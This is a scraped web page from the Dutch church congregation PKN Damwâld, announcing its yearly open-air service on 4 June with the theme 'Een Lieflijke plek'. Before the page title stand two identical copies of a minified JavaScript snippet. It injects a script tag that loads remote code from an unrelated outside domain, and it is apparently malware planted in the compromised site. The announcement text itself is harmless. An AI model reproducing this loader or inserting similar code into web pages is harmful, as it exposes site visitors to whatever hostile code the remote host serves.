;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Openluchtdienst 4 juni ... Een Lieflijke plek - PKN Damwâld

Openluchtdienst 4 juni … Een Lieflijke plek

Gepubliceerd op: woensdag 17 mei 2023

Zondag 4 juni staat de jaarlijkse openluchtdienst ingepland op het parkeerterrein bij het gemeentehuis. Dit is een speciale dienst voor iedereen, jong en oud, om betrokken te worden bij het geloof, God en Jezus onze Heer. Een speciale dienst met veel samenzang, en zang van gospelkoor De Young Christian Singers uit Leeuwarden. De dienst wordt geleid door Gryt van der Galien uit Damwâld. Het thema is: Een Lieflijke plek. Deze dienst begint om 9.30. Vanaf 9.00 staat de koffie klaar. Wij vragen iedereen om zelf een stoel mee te nemen zodat u zeker bent van een zitplaats. Dit is een mooie dienst om ook vrienden, familie kennissen en buren uit te nodigen om mee te gaan en te genieten van een lieflijke plek. We gaan natuurlijk uit van mooi weer om ons te laten inspireren in de buitenlucht. Als dit niet mogelijk is wordt de dienst verplaatst naar de ontmoeting.

De collecte is na de dienst bij het verlaten van het parkeerterrein, de helft van de opbrengst is voor de onkosten van de dienst en de andere helft voor World Servants.